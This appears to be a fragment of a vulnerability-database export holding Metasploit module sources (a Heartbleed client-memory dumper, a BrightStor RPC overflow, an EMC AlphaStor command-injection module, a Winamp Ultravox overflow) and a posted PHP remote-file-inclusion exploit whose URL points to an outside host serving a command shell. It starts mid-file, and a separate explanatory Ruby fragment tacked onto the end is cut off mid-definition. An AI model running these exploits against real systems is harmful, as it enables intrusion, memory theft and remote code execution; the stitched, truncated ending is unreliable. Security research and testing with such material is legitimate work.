TLS messages\n def process_openssl_cleartext_request(c, data)\n message_type, message_version, protocol_version = data.unpack(\"Cn@9n\")\n\n if message_type == 0x15 and data.length >= 7\n message_level, message_reason = data[5,2].unpack(\"CC\")\n print_status(\"#{@state[c][:name]} Alert Level #{message_level} Reason #{message_reason}\")\n if message_level == 2 and message_reason == 0x30\n print_status(\"#{@state[c][:name]} Client rejected our certificate due to unknown CA\")\n return\n end\n\n # Any other fatal alert (level 2) also ends the session; the original\n # tested an undefined 'level' variable here, which raised NameError.\n if message_level == 2\n print_status(\"#{@state[c][:name]} Client rejected our connection with a fatal error: #{message_reason}\")\n return\n end\n\n end\n\n unless message_type == 0x18\n 
message_code = data[5,1].to_s.unpack(\"C\").first\n vprint_status(\"#{@state[c][:name]} Message #{sprintf(\"type %.2x v%.4x %.2x\", message_type, message_version, message_code)}\")\n end\n\n # Process the Client Hello\n unless @state[c][:received_hello]\n\n unless (message_type == 0x16 and data.length > 43 and message_code == 0x01)\n print_status(\"#{@state[c][:name]} Expected a Client Hello, received #{sprintf(\"type %.2x code %.2x\", message_type, message_code)}\")\n return\n end\n\n print_status(\"#{@state[c][:name]} Processing Client Hello...\")\n\n # Extract the client_random needed to compute the master key\n @state[c][:client_random] = data[11,32]\n @state[c][:received_hello] = true\n\n print_status(\"#{@state[c][:name]} Sending Server Hello...\")\n openssl_send_server_hello(c, data, protocol_version)\n return\n end\n\n # If we are negotiating TLS, handle Client Key Exchange/Change Cipher Spec\n if negotiate_tls?\n # Process the Client Key Exchange\n if message_type == 0x16 and data.length > 11 and message_code == 0x10\n print_status(\"#{@state[c][:name]} Processing Client Key Exchange...\")\n premaster_length = data[9, 2].unpack(\"n\").first\n\n # Extract the pre-master secret in encrypted form\n if data.length >= 11 + premaster_length\n premaster_encrypted = data[11, premaster_length]\n\n # Decrypt the pre-master secret using our RSA key\n premaster_clear = @cert_key.private_decrypt(premaster_encrypted) rescue nil\n @state[c][:premaster] = premaster_clear if premaster_clear\n end\n end\n\n # Process the Change Cipher Spec and switch to encrypted communications\n if message_type == 0x14 and message_code == 0x01\n print_status(\"#{@state[c][:name]} Processing Change Cipher Spec...\")\n initialize_encryption_keys(c)\n return\n end\n # Otherwise just start capturing heartbeats in clear-text mode\n else\n # Send heartbeat requests\n if @state[c][:heartbeats].length < heartbeat_limit\n openssl_send_heartbeat(c, protocol_version)\n end\n\n # Process cleartext 
heartbeat replies\n if message_type == 0x18\n vprint_status(\"#{@state[c][:name]} Heartbeat received (#{data.length-5} bytes) [#{@state[c][:heartbeats].length} bytes total]\")\n @state[c][:heartbeats] << data[5, data.length-5]\n end\n\n # Full up on heartbeats, disconnect the client\n if @state[c][:heartbeats].length >= heartbeat_limit\n print_status(\"#{@state[c][:name]} Heartbeats received [#{@state[c][:heartbeats].length} bytes total]\")\n store_captured_heartbeats(c)\n c.close()\n end\n end\n end\n\n # Process encrypted TLS messages\n def process_openssl_encrypted_request(c, data)\n message_type, message_version, protocol_version = data.unpack(\"Cn@9n\")\n\n return if @state[c][:shutdown]\n return unless data.length > 5\n\n buff = decrypt_data(c, data[5, data.length-5])\n unless buff\n print_error(\"#{@state[c][:name]} Failed to decrypt, giving up on this client\")\n c.close\n return\n end\n\n message_code = buff[0,1].to_s.unpack(\"C\").first\n vprint_status(\"#{@state[c][:name]} Message #{sprintf(\"type %.2x v%.4x %.2x\", message_type, message_version, message_code)}\")\n\n if message_type == 0x16\n print_status(\"#{@state[c][:name]} Processing Client Finished...\")\n end\n\n # Send heartbeat requests\n if @state[c][:heartbeats].length < heartbeat_limit\n openssl_send_heartbeat(c, protocol_version)\n end\n\n # Process heartbeat replies\n if message_type == 0x18\n vprint_status(\"#{@state[c][:name]} Encrypted heartbeat received (#{buff.length} bytes) [#{@state[c][:heartbeats].length} bytes total]\")\n @state[c][:heartbeats] << buff\n end\n\n # Full up on heartbeats, disconnect the client\n if @state[c][:heartbeats].length >= heartbeat_limit\n print_status(\"#{@state[c][:name]} Encrypted heartbeats received [#{@state[c][:heartbeats].length} bytes total]\")\n store_captured_heartbeats(c)\n c.close()\n end\n end\n\n # Dump captured memory to a file on disk using the loot API\n def store_captured_heartbeats(c)\n if @state[c][:heartbeats].length > 0\n begin\n path = 
store_loot(\n \"openssl.heartbleed.client\",\n \"application/octet-stream\",\n @state[c][:ip],\n @state[c][:heartbeats],\n nil,\n \"OpenSSL Heartbleed client memory\"\n )\n print_good(\"#{@state[c][:name]} Heartbeat data stored in #{path}\")\n rescue ::Interrupt\n raise $!\n rescue ::Exception\n print_error(\"#{@state[c][:name]} Heartbeat data could not be stored: #{$!.class} #{$!}\")\n end\n\n # Report the memory disclosure as a vulnerability on the host\n report_vuln({\n :host => @state[c][:ip],\n :name => self.name,\n :info => \"Module #{self.fullname} successfully dumped client memory contents\",\n :refs => self.references,\n :exploited_at => Time.now.utc\n }) rescue nil # Squash errors related to ip => 127.0.0.1 and the like\n end\n\n # Clear the heartbeat array\n @state[c][:heartbeats] = \"\"\n @state[c][:shutdown] = true\n end\n\n # Delete the state on connection close\n def on_client_close(c)\n # Do we have any pending heartbeats to save?\n if @state[c][:heartbeats].length > 0\n store_captured_heartbeats(c)\n end\n @state.delete(c)\n end\n\n # Send an OpenSSL Server Hello response\n def openssl_send_server_hello(c, hello, version)\n\n # If encrypted, use the TLS_RSA_WITH_AES_128_CBC_SHA; otherwise, use the\n # first cipher suite sent by the client.\n if @state[c][:encrypted]\n cipher = \"\\x00\\x2F\"\n else\n cipher = hello[46, 2]\n end\n\n # Create the Server Hello response\n extensions =\n \"\\x00\\x0f\\x00\\x01\\x01\" # Heartbeat\n\n server_hello_payload =\n [version].pack('n') + # Use the protocol version sent by the client.\n @state[c][:server_random] + # Random (Timestamp + Random Bytes)\n \"\\x00\" + # Session ID\n cipher + # Cipher ID (TLS_RSA_WITH_AES_128_CBC_SHA)\n \"\\x00\" + # Compression Method (none)\n [extensions.length].pack('n') + extensions\n\n server_hello = [0x02].pack(\"C\") + [ server_hello_payload.length ].pack(\"N\")[1,3] + server_hello_payload\n\n msg1 = \"\\x16\" + [version].pack('n') + [server_hello.length].pack(\"n\") + 
server_hello\n c.put(msg1)\n\n # Skip the rest of TLS if we arent negotiating it\n unless negotiate_tls?\n # Send a heartbeat request to start the stream and return\n openssl_send_heartbeat(c, version)\n return\n end\n\n # Certificates\n certs_combined = generate_certificates\n pay2 = \"\\x0b\" + [ certs_combined.length + 3 ].pack(\"N\")[1, 3] + [ certs_combined.length ].pack(\"N\")[1, 3] + certs_combined\n msg2 = \"\\x16\" + [version].pack('n') + [pay2.length].pack(\"n\") + pay2\n c.put(msg2)\n\n # End of Server Hello\n pay3 = \"\\x0e\\x00\\x00\\x00\"\n msg3 = \"\\x16\" + [version].pack('n') + [pay3.length].pack(\"n\") + pay3\n c.put(msg3)\n end\n\n # Send the heartbeat request that results in memory exposure\n def openssl_send_heartbeat(c, version)\n c.put \"\\x18\" + [version].pack('n') + \"\\x00\\x03\\x01\" + [heartbeat_read_size].pack(\"n\")\n end\n\n # Pack the certificates for use in the TLS reply\n def generate_certificates\n certs = []\n certs << generate_certificate.to_der\n certs_combined = certs.map { |cert| [ cert.length ].pack(\"N\")[1, 3] + cert }.join\n end\n\n # Generate a self-signed certificate to use for the service\n def generate_certificate\n key = @cert_key\n cert = OpenSSL::X509::Certificate.new\n cert.version = 2\n cert.serial = rand(0xFFFFFFFF)\n\n subject_cn = Rex::Text.rand_hostname\n subject = OpenSSL::X509::Name.new([\n [\"C\",\"US\"],\n ['ST', Rex::Text.rand_state()],\n [\"L\", Rex::Text.rand_text_alpha(rand(20) + 10).capitalize],\n [\"O\", Rex::Text.rand_text_alpha(rand(20) + 10).capitalize],\n [\"CN\", subject_cn],\n ])\n issuer = OpenSSL::X509::Name.new([\n [\"C\",\"US\"],\n ['ST', Rex::Text.rand_state()],\n [\"L\", Rex::Text.rand_text_alpha(rand(20) + 10).capitalize],\n [\"O\", Rex::Text.rand_text_alpha(rand(20) + 10).capitalize],\n [\"CN\", Rex::Text.rand_text_alpha(rand(20) + 10).capitalize],\n ])\n\n cert.subject = subject\n cert.issuer = issuer\n cert.not_before = Time.now - (3600 * 24 * 365) + rand(3600 * 14)\n cert.not_after 
= Time.now + (3600 * 24 * 365) + rand(3600 * 14)\n cert.public_key = key.public_key\n ef = OpenSSL::X509::ExtensionFactory.new(nil,cert)\n cert.extensions = [\n ef.create_extension(\"basicConstraints\",\"CA:FALSE\"),\n ef.create_extension(\"subjectKeyIdentifier\",\"hash\"),\n ef.create_extension(\"extendedKeyUsage\",\"serverAuth\"),\n ef.create_extension(\"keyUsage\",\"keyEncipherment,dataEncipherment,digitalSignature\")\n ]\n ef.issuer_certificate = cert\n cert.add_extension ef.create_extension(\"authorityKeyIdentifier\", \"keyid:always,issuer:always\")\n cert.sign(key, OpenSSL::Digest::SHA1.new)\n cert\n end\n\n # Decrypt the TLS message and return the result without the MAC\n def decrypt_data(c, data)\n return unless @state[c][:client_enc]\n\n cipher = @state[c][:client_enc]\n\n begin\n buff = cipher.update(data)\n buff << cipher.final\n\n # Trim the trailing MAC signature off the buffer\n if buff.length >= 20\n return buff[0, buff.length-20]\n end\n rescue ::OpenSSL::Cipher::CipherError => e\n print_error(\"#{@state[c][:name]} Decryption failed: #{e}\")\n end\n\n nil\n end\n\n # Calculate keys and toggle encrypted status\n def initialize_encryption_keys(c)\n tls1_calculate_crypto_keys(c)\n @state[c][:encrypted] = true\n end\n\n # Determine crypto keys for AES-128-CBC based on the master secret\n def tls1_calculate_crypto_keys(c)\n @state[c][:master] = tls1_calculate_master_key(c)\n return unless @state[c][:master]\n\n key_block = tls1_prf(\n @state[c][:master],\n \"key expansion\" + @state[c][:server_random] + @state[c][:client_random],\n (20 * 2) + (16 * 4)\n )\n\n # Extract the MAC, encryption, and IV from the keyblock\n @state[c].update({\n :client_write_mac_key => key_block.slice!(0, 20),\n :server_write_mac_key => key_block.slice!(0, 20),\n :client_write_key => key_block.slice!(0, 16),\n :server_write_key => key_block.slice!(0, 16),\n :client_iv => key_block.slice!(0, 16),\n :server_iv => key_block.slice!(0, 16),\n })\n\n client_cipher = 
OpenSSL::Cipher.new('aes-128-cbc')\n client_cipher.key = @state[c][:client_write_key]\n client_cipher.iv = @state[c][:client_iv]\n client_cipher.decrypt\n client_mac = OpenSSL::HMAC.new(@state[c][:client_write_mac_key], OpenSSL::Digest.new('sha1'))\n\n server_cipher = OpenSSL::Cipher.new('aes-128-cbc')\n server_cipher.key = @state[c][:server_write_key]\n server_cipher.iv = @state[c][:server_iv]\n server_cipher.encrypt\n server_mac = OpenSSL::HMAC.new(@state[c][:server_write_mac_key], OpenSSL::Digest.new('sha1'))\n\n @state[c].update({\n :client_enc => client_cipher,\n :client_mac => client_mac,\n :server_enc => server_cipher,\n :server_mac => server_mac\n })\n\n true\n end\n\n # Determine the master key from the premaster and client/server randoms\n def tls1_calculate_master_key(c)\n return unless (\n @state[c][:premaster] and\n @state[c][:client_random] and\n @state[c][:server_random]\n )\n tls1_prf(\n @state[c][:premaster],\n \"master secret\" + @state[c][:client_random] + @state[c][:server_random],\n 48\n )\n end\n\n # Random generator used to calculate key data for TLS 1.0/1.1\n def tls1_prf(input_secret, input_label, output_length)\n # Calculate S1 and S2 as even blocks of each half of the secret\n # string. 
If the blocks are uneven, then S1's last byte should\n # be duplicated by S2's first byte\n blen = (input_secret.length / 2.0).ceil\n s1 = input_secret[0, blen]\n s2_index = blen\n if input_secret.length % 2 != 0\n s2_index -= 1\n end\n s2 = input_secret[s2_index, blen]\n\n # Hash the first part with MD5\n out1 = tls1_p_hash('md5', s1, input_label, output_length).unpack(\"C*\")\n\n # Hash the second part with SHA1\n out2 = tls1_p_hash('sha1', s2, input_label, output_length).unpack(\"C*\")\n\n # XOR the results together\n [*(0..out1.length-1)].map {|i| out1[i] ^ out2[i] }.pack(\"C*\")\n end\n\n # Used by tls1_prf to generate arbitrary amounts of session key data\n def tls1_p_hash(digest, secret, label, olen)\n output = \"\"\n chunk = OpenSSL::Digest.new(digest).digest_length\n ctx = OpenSSL::HMAC.new(secret, OpenSSL::Digest.new(digest))\n ctx_tmp = OpenSSL::HMAC.new(secret, OpenSSL::Digest.new(digest))\n\n ctx.update(label)\n a1 = ctx.digest\n\n loop do\n ctx = OpenSSL::HMAC.new(secret, OpenSSL::Digest.new(digest))\n ctx_tmp = OpenSSL::HMAC.new(secret, OpenSSL::Digest.new(digest))\n ctx.update(a1)\n ctx_tmp.update(a1)\n ctx.update(label)\n\n if olen > chunk\n output << ctx.digest\n a1 = ctx_tmp.digest\n olen -= chunk\n else\n a1 = ctx.digest\n output << a1[0, olen]\n break\n end\n end\n\n output\n end\nend\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/server/openssl_heartbeat_client_memory.rb"}, {"lastseen": "2019-10-12T13:41:52", "bulletinFamily": "exploit", "description": "This module exploits a buffer overflow in Computer Associates BrightStor ARCserve Backup 11.1 - 11.5 SP2. 
By sending a specially crafted RPC request, an attacker could overflow the buffer and execute arbitrary code.\n", "modified": "2017-07-24T13:26:21", "published": "2010-10-04T22:00:22", "id": "MSF:EXPLOIT/WINDOWS/BRIGHTSTOR/MESSAGE_ENGINE_72", "href": "", "type": "metasploit", "title": "CA BrightStor ARCserve Message Engine 0x72 Buffer Overflow", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = AverageRanking\n\n include Msf::Exploit::Remote::DCERPC\n include Msf::Exploit::Remote::Seh\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'CA BrightStor ARCserve Message Engine 0x72 Buffer Overflow',\n 'Description' => %q{\n This module exploits a buffer overflow in Computer Associates BrightStor ARCserve Backup\n 11.1 - 11.5 SP2. By sending a specially crafted RPC request, an attacker could overflow\n the buffer and execute arbitrary code.\n },\n 'Author' => [ 'MC' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'OSVDB', '68329'],\n [ 'URL', 'http://www.metasploit.com/users/mc' ],\n ],\n 'Privileged' => true,\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'thread',\n },\n 'Payload' =>\n {\n 'Space' => 600,\n 'BadChars' => \"\\x00\\x0a\\x0d\\x5c\\x5f\\x2f\\x2e\",\n 'StackAdjustment' => -3500,\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'BrightStor ARCserve r11.5/Windows 2003',\t{ 'Ret' => 0x2380ceb5 } ],\n ],\n 'DisclosureDate' => 'Oct 4 2010',\n 'DefaultTarget' => 0))\n\n register_options([Opt::RPORT(6504)])\n end\n\n def exploit\n\n connect\n\n handle = dcerpc_handle('506b1890-14c8-11d1-bbc3-00805fa6962e', '1.0', 'ncacn_ip_tcp', [datastore['RPORT']])\n print_status(\"Binding to #{handle} ...\")\n\n dcerpc_bind(handle)\n print_status(\"Bound to #{handle} ...\")\n\n sploit = NDR.string(rand_text_english(760) + generate_seh_payload(target.ret) + \"\\x00\") + NDR.long(0)\n\n 
print_status(\"Trying target #{target.name}...\")\n\n begin\n dcerpc_call(0x72, sploit)\n rescue Rex::Proto::DCERPC::Exceptions::NoResponse\n end\n\n handler\n disconnect\n\n end\n\nend\n=begin\n/* opcode: 0x72, address: 0x28E893D0 */\n\nshort sub_28E893D0 (\n [in] handle_t arg_1,\n [in][ref][string] char * arg_2,\n [in, out][ref] long * arg_3\n);\n=end\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/brightstor/message_engine_72.rb"}, {"lastseen": "2019-11-24T11:19:34", "bulletinFamily": "exploit", "description": "EMC AlphaStor Device Manager is prone to a remote command-injection vulnerability because the application fails to properly sanitize user-supplied input.\n", "modified": "2019-07-26T23:53:46", "published": "2008-09-01T11:28:55", "id": "MSF:AUXILIARY/ADMIN/EMC/ALPHASTOR_DEVICEMANAGER_EXEC", "href": "", "type": "metasploit", "title": "EMC AlphaStor Device Manager Arbitrary Command Execution", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'EMC AlphaStor Device Manager Arbitrary Command Execution',\n 'Description' => %q{\n EMC AlphaStor Device Manager is prone to a remote command-injection vulnerability\n because the application fails to properly sanitize user-supplied input.\n },\n 'Author' => [ 'MC' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'URL', 'http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=703' ],\n [ 'OSVDB', '45715' ],\n [ 'CVE', '2008-2157' ],\n [ 'BID', '29398' ],\n ],\n 'DisclosureDate' => 'May 27 2008'))\n\n register_options(\n [\n Opt::RPORT(3000),\n OptString.new('CMD', [ false, 'The OS command to execute', 'hostname']),\n ])\n end\n\n def run\n connect\n\n 
data = \"\\x75\" + datastore['CMD']\n pad = \"\\x00\" * 512\n\n pkt = data + pad\n\n print_status(\"Sending command: #{datastore['CMD']}\")\n sock.put(pkt)\n\n # try to suck it all in.\n select(nil,nil,nil,5)\n\n res = sock.get_once || ''\n\n res.each_line do |info|\n print_status(\"#{info.gsub(/[^[:print:]]+/,\"\")}\") # hack.\n end\n\n disconnect\n rescue ::Rex::ConnectionError => e\n print_error 'Connection failed'\n rescue ::EOFError => e\n print_error 'No reply'\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/admin/emc/alphastor_devicemanager_exec.rb"}, {"lastseen": "2019-11-05T00:23:32", "bulletinFamily": "exploit", "description": "This module exploits a stack buffer overflow in Winamp 5.24. By sending an overly long artist tag, a remote attacker may be able to execute arbitrary code. This vulnerability can be exploited from the browser or the Winamp client itself.\n", "modified": "2017-09-14T02:03:34", "published": "2008-03-01T17:20:24", "id": "MSF:EXPLOIT/WINDOWS/BROWSER/WINAMP_ULTRAVOX", "href": "", "type": "metasploit", "title": "Winamp Ultravox Streaming Metadata (in_mp3.dll) Buffer Overflow", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Msf::Exploit::Remote::TcpServer\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Winamp Ultravox Streaming Metadata (in_mp3.dll) Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack buffer overflow in Winamp 5.24. By\n sending an overly long artist tag, a remote attacker may\n be able to execute arbitrary code. 
This vulnerability can be\n exploited from the browser or the Winamp client itself.\n },\n 'Author' => 'MC',\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2008-0065' ],\n [ 'OSVDB', '41707' ],\n [ 'BID', '27344' ],\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'process',\n },\n 'Payload' =>\n {\n 'Space' => 700,\n 'BadChars' => \"\\x00\\x09\\x0a\\x0d\\x20\\x22\\x25\\x26\\x27\\x2b\\x2f\\x3a\\x3c\\x3e\\x3f\\x40\",\n 'StackAdjustment' => -3500,\n 'PrependEncoder' => \"\\x81\\xc4\\xff\\xef\\xff\\xff\\x44\",\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Winamp 5.24', { 'Ret' => 0x15010d3e } ],\n ],\n 'Privileged' => false,\n 'DisclosureDate' => 'Jan 18 2008',\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptPort.new('SRVPORT', [ true, \"The HTTP daemon port to listen on.\", 8080 ])\n ])\n end\n\n def on_client_connect(client)\n return if ((p = regenerate_payload(client)) == nil)\n\n res = client.get_once\n\n content = \"\\x00\\x01\\x00\\x01\\x00\\x01\" + \"<metadata><song><artist>\"\n content << make_nops(3828 - payload.encoded.length) + payload.encoded\n content << Rex::Arch::X86.jmp_short(6) + make_nops(2) + [target.ret].pack('V')\n content << [0xe8, -850].pack('CV') + rand_text_alpha_upper(1183)\n content << \"</artist></song></metadata>\"\n\n sploit = \"\\x5a\\x00\\x39\\x01\" + [content.length].pack('n')\n sploit << content + \"\\x00\"\n\n # randomize some stuff.\n num = rand(65535).to_s\n\n header = \"HTTP/1.0 200 OK\\r\\n\"\n header << \"Server: Ultravox 3.0\\r\\n\"\n header << \"Content-Type: misc/ultravox\\r\\n\"\n header << \"Ultravox-SID: #{num}\\r\\n\"\n header << \"Ultravox-Avg-Bitrate: #{num}\\r\\n\"\n header << \"Ultravox-Max-Bitrate: #{num}\\r\\n\"\n header << \"Ultravox-Max-Msg: #{num}\\r\\n\"\n header << \"Ultravox-Stream-Info: Ultravox;Live Stream\\r\\n\"\n header << \"Ultravox-Msg-Que: #{num}\\r\\n\"\n header << \"Ultravox-Max-Fragments: 1\\r\\n\\r\\n\"\n header << sploit\n\n print_status(\"Sending #{header.length} 
bytes\")\n\n client.put(header)\n handler(client)\n\n service.close_client(client)\n end\nend\n\n\n=begin\nHTTP/1.0 200\n.Server: Ultravo\nx 3.0..Content-T\nype: misc/ultrav\nox..Ultravox-SID\n: 22221..Ultravo\nx-Avg-Bitrate: 6\n4000..Ultravox-M\nax-Bitrate: 9600\n0..Ultravox-Max-\nMsg: 16000..Ultr\navox-Stream-Info\n: Ultravox;Live\nStream..Ultravox\n-Msg-Que: 39..Ul\ntravox-Max-Fragm\n\nZ.9..,......<met\nadata><length>0<\n/length><soon>Mo\nre on\n</soon><song><na\nme>The Night\nghts In\ntin</name><album\n>Days Of\nPassed</album><a\nrtist>The Moody\nBlues</artist><a\nlbum_art>xm/stat\nion_logo_WBCRHT.\njpg</album_art><\nalbum_art_200>xm\n/station_logo_WB\nCRHT_200.jpg</al\nbum_art_200><ser\nial>-1</serial><\nsong_id>-1</song\n_id><amg_song_id\n>-1</amg_song_id\n><amg_artist_id>\n-1</amg_artist_i\nd><amg_album_id>\n-1</amg_album_id\n><itunes_song_id\n>-1</itunes_song\n_id><itunes_arti\nst_id>-1</itunes\n_artist_id><itun\nes_album_id>-1</\nitunes_album_id>\n</song></metadat\na>.Z.......\\./!.\n!.UP.......B...&\nZ....D)ydB.,.vy/\n=end\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/browser/winamp_ultravox.rb"}], "securityvulns": [{"lastseen": "2018-08-31T11:09:25", "bulletinFamily": "software", "description": "PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc.", "modified": "2007-04-22T00:00:00", "published": "2007-04-22T00:00:00", "id": "SECURITYVULNS:VULN:7622", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:7622", "title": "Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:10:21", "bulletinFamily": "software", "description": "Hello,,\r\n\r\nFullyModdedphpBB2 Remote File Inclusion .. 
With exploit :)\r\n\r\nDiscovered By : HACKERS PAL\r\nCopy rights : HACKERS PAL\r\nWebsite : http://www.soqor.net\r\nEmail Address : security@soqor.net\r\n\r\n\r\n/* Script info\r\n## Mod Title: FullyModdedphpBB2\r\n## Description: A fully modded phpBB\r\n*/\r\n\r\nRemote File Include:\r\nsubscp.php?phpbb_root_path=http://psevil.googlepages.com/cmd.txt?\r\n\r\nExploit:\r\n<?php\r\n/************************************************/\r\n/* Fully Moded PHPBB2 Command Execution Exploit */\r\n/* By : HACKERS PAL <security@soqor.net> */\r\n/* Website : WwW.SoQoR.NeT */\r\n/************************************************/\r\n\r\nerror_reporting(0);\r\nini_set("max_execution_time",0);\r\nFunction get_page($url){if(function_exists("file_get_contents")){$contents=file_get_contents($url);}else{$fp=fopen("$url","r");while($line=fread($fp,1024)){$contents=$contents.$line;}}return$contents;}\r\nEcho "<body bgcolor=\"#000000\" text=\"#00FF00\">\n<title>Fully Moded PHPBB2 Command Execution Exploit by : HACKERS PAL :: WwW.SoQoR.NeT ::</title>\n\r"."<h2>Fully Moded PHPBB2 Command Execution\n\r"."<h3>By : HACKERS PAL [security@soqor.net]\n\r"."<h3>VisiT My Website [<a href=\"http://WwW.SoQoR.NeT\">WwW.SoQoR.NeT</a>]\n\r";\r\n $expl=base64_decode("c3Vic2NwLnBocD9waHBiYl9yb290X3BhdGg9aHR0cDovL3BzZXZpbC5nb29nbGVwYWdlcy5jb20vY21kLnR4dD8=");\r\n $action=$_GET['action'];\r\n if($action == "")\r\n {\r\n echo "<form action=\"$PHP_SELF?action=2\" method=\"post\">\n Web URL -- Example : http://localhost/FullyModed\n <br> <input type=\"text\" name=\"url\" style=\"width:250\">\n <br> <br>\n Command : <br> <textarea name=\"query\" cols=\"70\" rows=\"5\"></textarea>\n <br>\n <br> <div align=\"center\">\n <input type=\"submit\"> </div>\n </form>\n ";\r\n }\r\n else\r\n {\r\n $exploit=$_POST['url']."/".$expl."&cmd=".$_POST['query'];\r\n\r\n $page=get_page($exploit);\r\n if(!eregi("hacking attempt",$page))\r\n {\r\n Echo "<h1> Command Successfully executed .. 
Result is</h1> $page <br> Thanks For Using This exploit .. Have Fun :)<br><br><br>";\r\n\r\n }\r\n\r\n }\r\ndie(base64_decode("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\r\n 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\r\n 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\r\n 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\r\n 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\r\n vZm9udD48Zm9udCBjb2xvcj0iI0ZGRkZGRiIgZmFjZT0iVmVyZGFuYSIgc2l6ZT0iMiI+bzwvZm9udD48Zm9udCBjb2xvcj0iI0ZGMDAwMCIgZmFjZT0iVmVyZGFuYSIgc2l6ZT0iMiI+UjwvZm9udD48Zm9udCBjb2xvcj0iIzAwODAwMCIgZmFjZT0iVmVyZGFuYSIgc2l6ZT0iMiI+W0RvVF08L2ZvbnQ+PGZvbnQgY29sb3I9IiNGRjAwMDAiIGZhY2U9IlZlcmRhbmEiIHNpemU9IjIiPk48L2ZvbnQ+PGZvbnQgY29sb3I9IiNGRkZGRkYiIGZhY2U9IlZlcmRhbmEiIHNpemU9IjIiPmU8L2ZvbnQ+PGZvbnQgY29sb3I9IiNGRjAwMDAiIGZhY2U9IlZlcmRhbmEiIHNpemU9IjIiPlQ8L2ZvbnQ+PC9hPgo8YnI+CjxhIGhyZWY9Imh0dHA6Ly93d3cuc29xb3IubmV0IiBzdHlsZT0idGV4dC1kZWNvcmF0aW9uOiBub25lOyI+PGZvbnQgY29sb3I9IiNGRjAwMDAiPlc8L2ZvbnQ+PGZvbnQgY29sb3I9IiNGRkZGRkYiPnc8L2ZvbnQ+PGZvbnQgY29sb3I9IiNGRjAwMDAiPlc8L2ZvbnQ+PGZvbnQgY29sb3I9IiMwMDgwMDAiIGZhY2U9IlZlcmRhbmEiIHNpemU9IjIiPltEb1RdPC9mb250Pjxmb250IGNvbG9yPSIjRkYwMDAwIiBmYWNlPSJWZXJkYW5hIiBzaXplPSIyIj5TPC9mb250Pjxmb250IGNvbG9yPSIjRkZGRkZGIiBmYWNlPSJWZXJkYW5hIiBzaXplPSIyIj5vPC9mb250Pjxmb250IGNvbG9yPSIjRkYwMDAwIiBmYWNlPSJWZXJkYW5hIiBzaXplPSIyIj5RPC9mb250Pjxmb250IGNvbG9yPSIjRkZGRkZGIiBmYWNl\r\n PSJWZXJkYW5hIiBzaXplPSIyIj5vPC9mb250Pjxmb250IGNvbG9yPSIjRkYwMDAwIiBmYWNlPSJWZXJkYW5hIiBzaXplPSIyIj5SPC9mb250Pjxmb250IGNvbG9yPSIjMDA4MDAwIiBmYWNlPSJWZXJkYW5hIiBzaXplPSIyIj5bRG9UXTwvZm9udD48Zm9udCBjb2xvcj0iI0ZGMDAwMCIgZmFjZT0iVmVyZGFuYSIgc2l6ZT0iMiI+TjwvZm9udD48Zm9udCBjb2xvcj0iI0ZGRkZGRiIgZmFjZT0iVmVyZGFuYSIgc2l6ZT0iMiI+ZTwvZm9udD48Zm9udCBjb2xvcj0iI0ZGMDAwMCIgZmFjZT0iVmVyZGFuYSIgc2l6ZT0iMiI+VDwvZm9udD48L2E+CjwvZGl2Pgo8L2JvZHk+"));\r\n?>", "modified": "2007-04-20T00:00:00", "published": "2007-04-20T00:00:00", "id": "SECURITYVULNS:DOC:16800", "href": 
"https://vulners.com/securityvulns/SECURITYVULNS:DOC:16800", "title": "FullyModdedphpBB2 Remote File Inclusion", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}]}
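The openssl_heartbeat_client_memory module above sends a heartbeat record whose fragment is only three bytes (type 1, then a 16-bit payload_length with no payload behind it), and the leak comes from the peer copying payload_length bytes anyway. The following Ruby block is an added example, not code from the Metasploit module or from OpenSSL: it builds that record exactly as openssl_send_heartbeat does, then runs it through a model of the pre-1.0.1g heartbeat handler and through one carrying the bounds check from the fix (discard when 1 + 2 + payload_length + 16 exceeds the record length). The "heap" is a constructed String standing in for the memory that follows the record in the process; the function names and the fake secret are hypothetical.

```ruby
# Added example: model of the Heartbleed (CVE-2014-0160) record and handler.
# Not part of the Metasploit module or OpenSSL; names and data are constructed.

HEARTBEAT_REQUEST  = 1
HEARTBEAT_RESPONSE = 2
HB_PADDING         = 16 # RFC 6520 minimum padding on every heartbeat message

# TLS record: content type 0x18 (heartbeat), protocol version, 16-bit length, fragment.
def build_record(version, fragment)
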